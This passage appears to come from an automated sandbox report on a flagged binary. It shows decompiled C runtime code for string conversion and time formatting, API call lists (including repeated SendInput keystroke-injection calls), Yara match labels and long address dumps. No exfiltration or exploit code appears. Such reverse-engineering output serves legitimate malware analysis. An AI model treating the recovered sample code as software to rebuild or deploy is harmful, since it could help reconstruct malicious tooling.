                                                                                                								__eflags = _a28;
                                                                                                								if(_a28 != 0) {
                                                                                                									_push(_a28);
                                                                                                									_push(_a24);
                                                                                                								} else {
                                                                                                									_push(0);
                                                                                                									_push(0);
                                                                                                								}
                                                                                                								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                                                								__eflags = _t105;
                                                                                                								if(_t105 != 0) {
                                                                                                									E004318FD(_t101);
                                                                                                									goto L37;
                                                                                                								} else {
                                                                                                									goto L35;
                                                                                                								}
                                                                                                							}
                                                                                                							_t90 = _t96 + 8;
                                                                                                							__eflags = _t96 - _t90;
                                                                                                							asm("sbb eax, eax");
                                                                                                							_t66 = _t60 & _t90;
                                                                                                							_t87 = _t96 + 8;
                                                                                                							__eflags = _t66 - 0x400;
                                                                                                							if(_t66 > 0x400) {
                                                                                                								__eflags = _t96 - _t87;
                                                                                                								asm("sbb eax, eax");
                                                                                                								_t101 = E00440C6C(_t87, _t66 & _t87);
                                                                                                								_pop(_t87);
                                                                                                								__eflags = _t101;
                                                                                                								if(_t101 == 0) {
                                                                                                									goto L35;
                                                                                                								}
                                                                                                								 *_t101 = 0xdddd;
                                                                                                								L28:
                                                                                                								_t101 =  &(_t101[4]);
                                                                                                								goto L30;
                                                                                                							}
                                                                                                							__eflags = _t96 - _t87;
                                                                                                							asm("sbb eax, eax");
                                                                                                							E004519B0();
                                                                                                							_t101 = _t107;
                                                                                                							__eflags = _t101;
                                                                                                							if(_t101 == 0) {
                                                                                                								goto L35;
                                                                                                							}
                                                                                                							 *_t101 = 0xcccc;
                                                                                                							goto L28;
                                                                                                						}
                                                                                                						_t70 = _a28;
                                                                                                						if(_t70 == 0) {
                                                                                                							goto L37;
                                                                                                						}
                                                                                                						_t125 = _t105 - _t70;
                                                                                                						if(_t105 > _t70) {
                                                                                                							goto L36;
                                                                                                						}
                                                                                                						_t71 = E00443906(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                                                						_t105 = _t71;
                                                                                                						if(_t71 != 0) {
                                                                                                							goto L37;
                                                                                                						}
                                                                                                						goto L36;
                                                                                                					}
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t72 = _t54 & _t95 + 0x00000008;
                                                                                                					_t85 = _t95 + 8;
                                                                                                					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                                                						__eflags = _t95 - _t85;
                                                                                                						asm("sbb eax, eax");
                                                                                                						_t81 = E00440C6C(_t85, _t72 & _t85);
                                                                                                						_pop(_t85);
                                                                                                						__eflags = _t81;
                                                                                                						if(__eflags == 0) {
                                                                                                							goto L36;
                                                                                                						}
                                                                                                						 *_t81 = 0xdddd;
                                                                                                						L12:
                                                                                                						_t81 =  &(_t81[4]);
                                                                                                						goto L14;
                                                                                                					}
                                                                                                					asm("sbb eax, eax");
                                                                                                					E004519B0();
                                                                                                					_t81 = _t107;
                                                                                                					if(_t81 == 0) {
                                                                                                						goto L36;
                                                                                                					}
                                                                                                					 *_t81 = 0xcccc;
                                                                                                					goto L12;
                                                                                                				}
                                                                                                			}


                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043BE96,0043BE96,?,?,?,00444A39,00000001,00000001,03E85006), ref: 00444842
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044487A
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00444A39,00000001,00000001,03E85006,?,?,?), ref: 004448C8
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044495F
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,03E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004449C2
                                                                                                • __freea.LIBCMT ref: 004449CF
                                                                                                  • Part of subcall function 00440C6C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                • __freea.LIBCMT ref: 004449D8
                                                                                                • __freea.LIBCMT ref: 004449FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3864826663-0
                                                                                                • Opcode ID: b4e1e2f10b3423daa5f40f4cc138610c0013d1e46d1004ca469c9909f36bc7f0
                                                                                                • Instruction ID: d02bb2a041cccfade64d9aa9d91115d3dccb2f1a9088e3ccbf10952fb6e82d87
                                                                                                • Opcode Fuzzy Hash: b4e1e2f10b3423daa5f40f4cc138610c0013d1e46d1004ca469c9909f36bc7f0
                                                                                                • Instruction Fuzzy Hash: 115103B2610216ABFB249F75CC41FBB77A9EB80764F14462BFD04D6240EB38DC509658
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 00415CA0
                                                                                                • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415CBE
                                                                                                • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415CDB
                                                                                                • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415CED
                                                                                                • SendInput.USER32(00000001,00000001,0000001C), ref: 00415D04
                                                                                                • SendInput.USER32(00000001,00000001,0000001C), ref: 00415D21
                                                                                                • SendInput.USER32(00000001,00000001,0000001C), ref: 00415D3D
                                                                                                • SendInput.USER32(00000001,?,0000001C,?), ref: 00415D5A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InputSend
                                                                                                • String ID:
                                                                                                • API String ID: 3431551938-0
                                                                                                • Opcode ID: d65834eab052123d68c5b2b91191ac281f6b0e762dfb1d59326661db85ab796e
                                                                                                • Instruction ID: 2ccc25ff1b7fe1a998df7354d480448ce1667da0ef0d996d49ebc9f0d066bfe0
                                                                                                • Opcode Fuzzy Hash: d65834eab052123d68c5b2b91191ac281f6b0e762dfb1d59326661db85ab796e
                                                                                                • Instruction Fuzzy Hash: 0C313E71D9026CA9FB109BD1DC46FFFBB78AF58B14F04000AE600AA1C2D6E995C58BE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 88%
                                                                                                			E004422C4(void* __ebx, signed int __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
                                                                                                				signed int _v8;
                                                                                                				short _v10;
                                                                                                				short _v12;
                                                                                                				short _v14;
                                                                                                				short _v16;
                                                                                                				short _v18;
                                                                                                				short _v22;
                                                                                                				char _v24;
                                                                                                				signed int _v28;
                                                                                                				signed int* _v32;
                                                                                                				signed int _v33;
                                                                                                				signed int** _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				intOrPtr* _v48;
                                                                                                				char _v52;
                                                                                                				void* _v64;
                                                                                                				signed int _t86;
                                                                                                				intOrPtr _t91;
                                                                                                				signed int _t94;
                                                                                                				signed int _t95;
                                                                                                				signed int _t96;
                                                                                                				void* _t97;
                                                                                                				signed int _t98;
                                                                                                				signed int _t102;
                                                                                                				signed int _t103;
                                                                                                				signed int _t104;
                                                                                                				intOrPtr _t105;
                                                                                                				signed int _t110;
                                                                                                				void* _t111;
                                                                                                				signed int _t116;
                                                                                                				signed int _t117;
                                                                                                				signed int _t129;
                                                                                                				void* _t133;
                                                                                                				signed int _t135;
                                                                                                				intOrPtr _t143;
                                                                                                				signed short* _t144;
                                                                                                				intOrPtr _t145;
                                                                                                				signed int** _t146;
                                                                                                				signed int _t147;
                                                                                                				signed int* _t148;
                                                                                                				signed int _t149;
                                                                                                				signed int _t152;
                                                                                                				signed short** _t154;
                                                                                                				signed int _t155;
                                                                                                				signed int _t159;
                                                                                                				signed int _t163;
                                                                                                				intOrPtr* _t171;
                                                                                                				signed short _t172;
                                                                                                				signed short* _t173;
                                                                                                				signed int** _t174;
                                                                                                				void* _t175;
                                                                                                				void* _t177;
                                                                                                				signed short* _t179;
                                                                                                				intOrPtr* _t180;
                                                                                                				intOrPtr* _t181;
                                                                                                				signed int* _t183;
                                                                                                				signed int _t184;
                                                                                                				signed int** _t185;
                                                                                                				signed int _t186;
                                                                                                				signed int _t187;
                                                                                                				signed int _t188;
                                                                                                
                                                                                                				_t149 = __ecx;
                                                                                                				_t86 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t86 ^ _t187;
                                                                                                				_t171 = _a12;
                                                                                                				_v52 = _a4;
                                                                                                				_t143 = _a24;
                                                                                                				_v40 = _a16;
                                                                                                				_v48 = _t171;
                                                                                                				_v44 = _t143;
                                                                                                				_t183 = _a20;
                                                                                                				_v32 = _t183;
                                                                                                				_t91 = _a8;
                                                                                                				if(_t91 == 0) {
                                                                                                					_t179 =  *(_t143 + 0x154);
                                                                                                				} else {
                                                                                                					if(_t91 == 1) {
                                                                                                						_t179 =  *(_t143 + 0x158);
                                                                                                					} else {
                                                                                                						_t179 =  *(_t143 + 0x15c);
                                                                                                					}
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
                                                                                                					goto L113;
                                                                                                				} else {
                                                                                                					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
                                                                                                					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
                                                                                                					_v33 = _t163;
                                                                                                					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
                                                                                                					_v18 =  *((intOrPtr*)(_t171 + 0xc));
                                                                                                					_v16 =  *((intOrPtr*)(_t171 + 8));
                                                                                                					_v14 =  *((intOrPtr*)(_t171 + 4));
                                                                                                					_v12 =  *_t171;
                                                                                                					_v10 = 0;
                                                                                                					_t194 = _t163;
                                                                                                					if(_t163 == 0) {
                                                                                                						__eflags = 0;
                                                                                                						_t129 = E004435BE(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
                                                                                                					} else {
                                                                                                						_t129 = E00443700(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
                                                                                                					}
                                                                                                					_t147 = _t129;
                                                                                                					if(_t147 == 0) {
                                                                                                						goto L113;
                                                                                                					} else {
                                                                                                						_t175 = _t147 + _t147;
                                                                                                						_t165 = _t175 + 8;
                                                                                                						asm("sbb eax, eax");
                                                                                                						if((_t175 + 0x00000008 & _t129) == 0) {
                                                                                                							_t184 = 0;
                                                                                                							__eflags = 0;
                                                                                                							L18:
                                                                                                							_v28 = _t184;
                                                                                                							if(_t184 == 0) {
                                                                                                								L30:
                                                                                                								E004318FD(0);
                                                                                                								_t183 = _v32;
                                                                                                								while(1) {
                                                                                                									L113:
                                                                                                									_t172 =  *_t179 & 0x0000ffff;
                                                                                                									__eflags = _t172;
                                                                                                									if(_t172 == 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags =  *_t183;
                                                                                                									if( *_t183 == 0) {
                                                                                                										L28:
                                                                                                										L29:
                                                                                                										return E00430A5B(_v8 ^ _t187);
                                                                                                									}
                                                                                                									_v32 = 0;
                                                                                                									_t152 = 0;
                                                                                                									__eflags = 0;
                                                                                                									_v28 = _t179;
                                                                                                									_t144 = _t179;
                                                                                                									_t94 = _t172 & 0x0000ffff;
                                                                                                									do {
                                                                                                										_t144 =  &(_t144[1]);
                                                                                                										_t152 = _t152 + 1;
                                                                                                										__eflags =  *_t144 - _t94;
                                                                                                									} while ( *_t144 == _t94);
                                                                                                									_t95 = _t172 & 0x0000ffff;
                                                                                                									_v28 = _t144;
                                                                                                									_t145 = _v44;
                                                                                                									__eflags = _t95 - 0x64;
                                                                                                									if(__eflags > 0) {
                                                                                                										_t96 = _t95 - 0x68;
                                                                                                										__eflags = _t96;
                                                                                                										if(_t96 == 0) {
                                                                                                											_t153 = _t152 - 1;
                                                                                                											__eflags = _t153;
                                                                                                											if(_t153 == 0) {
                                                                                                												_v32 = 1;
                                                                                                												L110:
                                                                                                												_push(0x49);
                                                                                                												L111:
                                                                                                												_pop(_t97);
                                                                                                												_t84 =  &_v52; // 0x44283b
                                                                                                												_t98 = E0044168E(_t145, _t153, _t179,  *_t84, _t97, _v48, _v40, _t183, _t145, _v32);
                                                                                                												_t188 = _t188 + 0x1c;
                                                                                                												__eflags = _t98;
                                                                                                												if(_t98 == 0) {
                                                                                                													 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                													goto L29;
                                                                                                												}
                                                                                                												L112:
                                                                                                												_t179 = _v28;
                                                                                                												continue;
                                                                                                											}
                                                                                                											_t153 = _t153 - 1;
                                                                                                											__eflags = _t153;
                                                                                                											if(_t153 == 0) {
                                                                                                												goto L110;
                                                                                                											}
                                                                                                											L108:
                                                                                                											_t154 = _v40;
                                                                                                											_t179 =  &(_t179[1]);
                                                                                                											 *( *_t154) = _t172;
                                                                                                											 *_t154 =  &(( *_t154)[1]);
                                                                                                											 *_t183 =  *_t183 - 1;
                                                                                                											continue;
                                                                                                										}
                                                                                                										_t102 = _t96 - 5;
                                                                                                										__eflags = _t102;
                                                                                                										if(_t102 == 0) {
                                                                                                											_t153 = _t152 - 1;
                                                                                                											__eflags = _t153;
                                                                                                											if(_t153 == 0) {
                                                                                                												_v32 = 1;
                                                                                                												L105:
                                                                                                												_push(0x4d);
                                                                                                												goto L111;
                                                                                                											}
                                                                                                											_t153 = _t153 - 1;
                                                                                                											__eflags = _t153;
                                                                                                											if(_t153 == 0) {
                                                                                                												goto L105;
                                                                                                											}
                                                                                                											goto L108;
                                                                                                										}
                                                                                                										_t103 = _t102 - 6;
                                                                                                										__eflags = _t103;
                                                                                                										if(_t103 == 0) {
                                                                                                											_t153 = _t152 - 1;
                                                                                                											__eflags = _t153;
                                                                                                											if(_t153 == 0) {
                                                                                                												_v32 = 1;
                                                                                                												L100:
                                                                                                												_push(0x53);
                                                                                                												goto L111;
                                                                                                											}
                                                                                                											_t153 = _t153 - 1;
                                                                                                											__eflags = _t153;
                                                                                                											if(_t153 == 0) {
                                                                                                												goto L100;
                                                                                                											}
                                                                                                											goto L108;
                                                                                                										}
                                                                                                										_t104 = _t103 - 1;
                                                                                                										__eflags = _t104;
                                                                                                										if(_t104 == 0) {
                                                                                                											_t105 = _v48;
                                                                                                											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
                                                                                                											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
                                                                                                												_t173 =  *(_t145 + 0x150);
                                                                                                											} else {
                                                                                                												_t173 =  *(_t145 + 0x14c);
                                                                                                											}
                                                                                                											__eflags = _t152 - 1;
                                                                                                											if(_t152 != 1) {
                                                                                                												L91:
                                                                                                												_t155 =  *_t173 & 0x0000ffff;
                                                                                                												__eflags = _t155;
                                                                                                												if(_t155 == 0) {
                                                                                                													goto L112;
                                                                                                												}
                                                                                                												_t146 = _v40;
                                                                                                												while(1) {
                                                                                                													__eflags =  *_t183;
                                                                                                													if( *_t183 <= 0) {
                                                                                                														goto L112;
                                                                                                													}
                                                                                                													_t173 =  &(_t173[1]);
                                                                                                													 *( *_t146) = _t155;
                                                                                                													 *_t146 =  &(( *_t146)[0]);
                                                                                                													 *_t183 =  *_t183 - 1;
                                                                                                													_t155 =  *_t173 & 0x0000ffff;
                                                                                                													__eflags = _t155;
                                                                                                													if(_t155 != 0) {
                                                                                                														continue;
                                                                                                													}
                                                                                                													goto L112;
                                                                                                												}
                                                                                                											} else {
                                                                                                												__eflags =  *_t183;
                                                                                                												if( *_t183 <= 0) {
                                                                                                													goto L91;
                                                                                                												}
                                                                                                												_t180 = _v40;
                                                                                                												 *((short*)( *_t180)) =  *_t173;
                                                                                                												 *_t180 =  *_t180 + 2;
                                                                                                												 *_t183 =  *_t183 - 1;
                                                                                                											}
                                                                                                											goto L112;
                                                                                                										}
                                                                                                										__eflags = _t104 != 5;
                                                                                                										if(_t104 != 5) {
                                                                                                											goto L108;
                                                                                                										}
                                                                                                										_t153 = _t152;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 == 0) {
                                                                                                											_push(0x79);
                                                                                                											goto L111;
                                                                                                										}
                                                                                                										_t153 = _t153;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 != 0) {
                                                                                                											goto L108;
                                                                                                										}
                                                                                                										_push(0x59);
                                                                                                										goto L111;
                                                                                                									}
                                                                                                									if(__eflags == 0) {
                                                                                                										_t153 = _t152 - 1;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 == 0) {
                                                                                                											_v32 = 1;
                                                                                                											L75:
                                                                                                											_push(0x64);
                                                                                                											goto L111;
                                                                                                										}
                                                                                                										_t153 = _t153 - 1;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 == 0) {
                                                                                                											goto L75;
                                                                                                										}
                                                                                                										_t153 = _t153 - 1;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 == 0) {
                                                                                                											_push(0x61);
                                                                                                											goto L111;
                                                                                                										}
                                                                                                										_t153 = _t153 - 1;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 != 0) {
                                                                                                											goto L108;
                                                                                                										}
                                                                                                										_push(0x41);
                                                                                                										goto L111;
                                                                                                									}
                                                                                                									__eflags = _t95 - 0x27;
                                                                                                									if(_t95 == 0x27) {
                                                                                                										_t110 = _t152 & 0x80000001;
                                                                                                										__eflags = _t110;
                                                                                                										if(__eflags < 0) {
                                                                                                											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
                                                                                                										}
                                                                                                										_t179 =  &(_t179[_t152]);
                                                                                                										if(__eflags == 0) {
                                                                                                											_t159 =  *_t179 & 0x0000ffff;
                                                                                                											__eflags = _t159;
                                                                                                											if(_t159 == 0) {
                                                                                                												goto L28;
                                                                                                											}
                                                                                                											_t174 = _v40;
                                                                                                											while(1) {
                                                                                                												__eflags =  *_t183;
                                                                                                												if( *_t183 == 0) {
                                                                                                													goto L113;
                                                                                                												}
                                                                                                												_t111 = 0x27;
                                                                                                												_t179 =  &(_t179[1]);
                                                                                                												__eflags = _t159 - _t111;
                                                                                                												if(_t159 == _t111) {
                                                                                                													goto L113;
                                                                                                												}
                                                                                                												 *( *_t174) = _t159;
                                                                                                												 *_t174 =  &(( *_t174)[0]);
                                                                                                												 *_t183 =  *_t183 - 1;
                                                                                                												_t159 =  *_t179 & 0x0000ffff;
                                                                                                												__eflags = _t159;
                                                                                                												if(_t159 != 0) {
                                                                                                													continue;
                                                                                                												}
                                                                                                												goto L113;
                                                                                                											}
                                                                                                										}
                                                                                                										continue;
                                                                                                									}
                                                                                                									__eflags = _t95 - 0x41;
                                                                                                									if(_t95 == 0x41) {
                                                                                                										L41:
                                                                                                										_t116 = E0044E1A1(_t145, _t179, _t183, _t179, L"am/pm");
                                                                                                										__eflags = _t116;
                                                                                                										if(_t116 != 0) {
                                                                                                											_t117 = E0044E1A1(_t145, _t179, _t183, _t179, L"a/p");
                                                                                                											_pop(_t153);
                                                                                                											__eflags = _t117;
                                                                                                											if(_t117 == 0) {
                                                                                                												_v28 =  &(_t179[3]);
                                                                                                											}
                                                                                                										} else {
                                                                                                											_t153 =  &(_t179[5]);
                                                                                                											_v28 =  &(_t179[5]);
                                                                                                										}
                                                                                                										_push(0x70);
                                                                                                										goto L111;
                                                                                                									}
                                                                                                									__eflags = _t95 - 0x48;
                                                                                                									if(_t95 == 0x48) {
                                                                                                										_t153 = _t152 - 1;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 == 0) {
                                                                                                											_v32 = 1;
                                                                                                											L55:
                                                                                                											_push(0x48);
                                                                                                											goto L111;
                                                                                                										}
                                                                                                										_t153 = _t153 - 1;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 == 0) {
                                                                                                											goto L55;
                                                                                                										}
                                                                                                										goto L108;
                                                                                                									}
                                                                                                									__eflags = _t95 - 0x4d;
                                                                                                									if(_t95 == 0x4d) {
                                                                                                										_t153 = _t152 - 1;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 == 0) {
                                                                                                											_v32 = 1;
                                                                                                											L50:
                                                                                                											_push(0x6d);
                                                                                                											goto L111;
                                                                                                										}
                                                                                                										_t153 = _t153 - 1;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 == 0) {
                                                                                                											goto L50;
                                                                                                										}
                                                                                                										_t153 = _t153 - 1;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 == 0) {
                                                                                                											_push(0x62);
                                                                                                											goto L111;
                                                                                                										}
                                                                                                										_t153 = _t153 - 1;
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 != 0) {
                                                                                                											goto L108;
                                                                                                										}
                                                                                                										_push(0x42);
                                                                                                										goto L111;
                                                                                                									}
                                                                                                									__eflags = _t95 - 0x61;
                                                                                                									if(_t95 != 0x61) {
                                                                                                										goto L108;
                                                                                                									}
                                                                                                									goto L41;
                                                                                                								}
                                                                                                								goto L28;
                                                                                                							}
                                                                                                							_t203 = _v33;
                                                                                                							if(_v33 == 0) {
                                                                                                								_t133 = E004435BE(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
                                                                                                							} else {
                                                                                                								_t133 = E00443700(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
                                                                                                							}
                                                                                                							_t181 = _t184;
                                                                                                							_t177 = _t133 - 1;
                                                                                                							if(_t177 <= 0) {
                                                                                                								L27:
                                                                                                								E004318FD(_t184);
                                                                                                								goto L28;
                                                                                                							} else {
                                                                                                								_t148 = _v32;
                                                                                                								_t185 = _v40;
                                                                                                								while( *_t148 > 0) {
                                                                                                									_t135 =  *_t181;
                                                                                                									_t181 = _t181 + 2;
                                                                                                									 *( *_t185) = _t135;
                                                                                                									 *_t185 =  &(( *_t185)[0]);
                                                                                                									 *_t148 =  *_t148 - 1;
                                                                                                									_t177 = _t177 - 1;
                                                                                                									if(_t177 > 0) {
                                                                                                										continue;
                                                                                                									}
                                                                                                									break;
                                                                                                								}
                                                                                                								_t184 = _v28;
                                                                                                								goto L27;
                                                                                                							}
                                                                                                						}
                                                                                                						asm("sbb eax, eax");
                                                                                                						_t137 = _t129 & _t175 + 0x00000008;
                                                                                                						_t165 = _t175 + 8;
                                                                                                						if((_t129 & _t175 + 0x00000008) > 0x400) {
                                                                                                							__eflags = _t175 - _t165;
                                                                                                							asm("sbb eax, eax");
                                                                                                							_t186 = E00440C6C(_t165, _t137 & _t165);
                                                                                                							_v28 = _t186;
                                                                                                							_pop(_t165);
                                                                                                							__eflags = _t186;
                                                                                                							if(__eflags == 0) {
                                                                                                								goto L30;
                                                                                                							}
                                                                                                							 *_t186 = 0xdddd;
                                                                                                							L14:
                                                                                                							_t184 = _t186 + 8;
                                                                                                							goto L18;
                                                                                                						}
                                                                                                						asm("sbb eax, eax");
                                                                                                						E004519B0();
                                                                                                						_t186 = _t188;
                                                                                                						_v28 = _t186;
                                                                                                						if(_t186 == 0) {
                                                                                                							goto L30;
                                                                                                						}
                                                                                                						 *_t186 = 0xcccc;
                                                                                                						goto L14;
                                                                                                					}
                                                                                                				}
                                                                                                			}
                                                                                                0x00000000
                                                                                                0x0044270d
                                                                                                0x004426d4
                                                                                                0x004426d4
                                                                                                0x004426d7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004426d9
                                                                                                0x004426d9
                                                                                                0x004426dc
                                                                                                0x004426e1
                                                                                                0x004426e4
                                                                                                0x004426e7
                                                                                                0x00000000
                                                                                                0x004426e7
                                                                                                0x00442608
                                                                                                0x00442608
                                                                                                0x0044260b
                                                                                                0x004426bb
                                                                                                0x004426bb
                                                                                                0x004426be
                                                                                                0x004426c7
                                                                                                0x004426cb
                                                                                                0x004426cb
                                                                                                0x00000000
                                                                                                0x004426cb
                                                                                                0x004426c0
                                                                                                0x004426c0
                                                                                                0x004426c3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004426c5
                                                                                                0x00442611
                                                                                                0x00442611
                                                                                                0x00442614
                                                                                                0x004426a7
                                                                                                0x004426a7
                                                                                                0x004426aa
                                                                                                0x004426b3
                                                                                                0x004426b7
                                                                                                0x004426b7
                                                                                                0x00000000
                                                                                                0x004426b7
                                                                                                0x004426ac
                                                                                                0x004426ac
                                                                                                0x004426af
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004426b1
                                                                                                0x0044261a
                                                                                                0x0044261a
                                                                                                0x0044261d
                                                                                                0x00442646
                                                                                                0x00442649
                                                                                                0x0044264d
                                                                                                0x00442657
                                                                                                0x0044264f
                                                                                                0x0044264f
                                                                                                0x0044264f
                                                                                                0x0044265d
                                                                                                0x00442660
                                                                                                0x0044267c
                                                                                                0x0044267c
                                                                                                0x0044267f
                                                                                                0x00442682
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442688
                                                                                                0x0044268b
                                                                                                0x0044268b
                                                                                                0x0044268e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442692
                                                                                                0x00442695
                                                                                                0x00442698
                                                                                                0x0044269b
                                                                                                0x0044269d
                                                                                                0x004426a0
                                                                                                0x004426a3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004426a5
                                                                                                0x00442662
                                                                                                0x00442662
                                                                                                0x00442665
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442667
                                                                                                0x0044266f
                                                                                                0x00442672
                                                                                                0x00442675
                                                                                                0x00442675
                                                                                                0x00000000
                                                                                                0x00442660
                                                                                                0x0044261f
                                                                                                0x00442622
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442629
                                                                                                0x00442629
                                                                                                0x0044262c
                                                                                                0x0044263f
                                                                                                0x00000000
                                                                                                0x0044263f
                                                                                                0x0044262f
                                                                                                0x0044262f
                                                                                                0x00442632
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442638
                                                                                                0x00000000
                                                                                                0x00442638
                                                                                                0x004424d0
                                                                                                0x004425ce
                                                                                                0x004425ce
                                                                                                0x004425d1
                                                                                                0x004425f4
                                                                                                0x004425f8
                                                                                                0x004425f8
                                                                                                0x00000000
                                                                                                0x004425f8
                                                                                                0x004425d3
                                                                                                0x004425d3
                                                                                                0x004425d6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004425d8
                                                                                                0x004425d8
                                                                                                0x004425db
                                                                                                0x004425ed
                                                                                                0x00000000
                                                                                                0x004425ed
                                                                                                0x004425dd
                                                                                                0x004425dd
                                                                                                0x004425e0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004425e6
                                                                                                0x00000000
                                                                                                0x004425e6
                                                                                                0x004424d6
                                                                                                0x004424d9
                                                                                                0x0044257b
                                                                                                0x0044257b
                                                                                                0x00442580
                                                                                                0x00442586
                                                                                                0x00442586
                                                                                                0x00442587
                                                                                                0x0044258a
                                                                                                0x00442590
                                                                                                0x00442593
                                                                                                0x00442596
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044259c
                                                                                                0x0044259f
                                                                                                0x0044259f
                                                                                                0x004425a2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004425aa
                                                                                                0x004425ab
                                                                                                0x004425ae
                                                                                                0x004425b1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004425b9
                                                                                                0x004425bc
                                                                                                0x004425bf
                                                                                                0x004425c1
                                                                                                0x004425c4
                                                                                                0x004425c7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004425c9
                                                                                                0x0044259f
                                                                                                0x00000000
                                                                                                0x0044258a
                                                                                                0x004424df
                                                                                                0x004424e2
                                                                                                0x004424f7
                                                                                                0x004424fd
                                                                                                0x00442504
                                                                                                0x00442506
                                                                                                0x00442561
                                                                                                0x00442567
                                                                                                0x00442568
                                                                                                0x0044256a
                                                                                                0x0044256f
                                                                                                0x0044256f
                                                                                                0x00442508
                                                                                                0x00442508
                                                                                                0x0044250b
                                                                                                0x0044250b
                                                                                                0x00442572
                                                                                                0x00000000
                                                                                                0x00442572
                                                                                                0x004424e4
                                                                                                0x004424e7
                                                                                                0x00442541
                                                                                                0x00442541
                                                                                                0x00442544
                                                                                                0x00442550
                                                                                                0x00442554
                                                                                                0x00442554
                                                                                                0x00000000
                                                                                                0x00442554
                                                                                                0x00442546
                                                                                                0x00442546
                                                                                                0x00442549
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044254b
                                                                                                0x004424e9
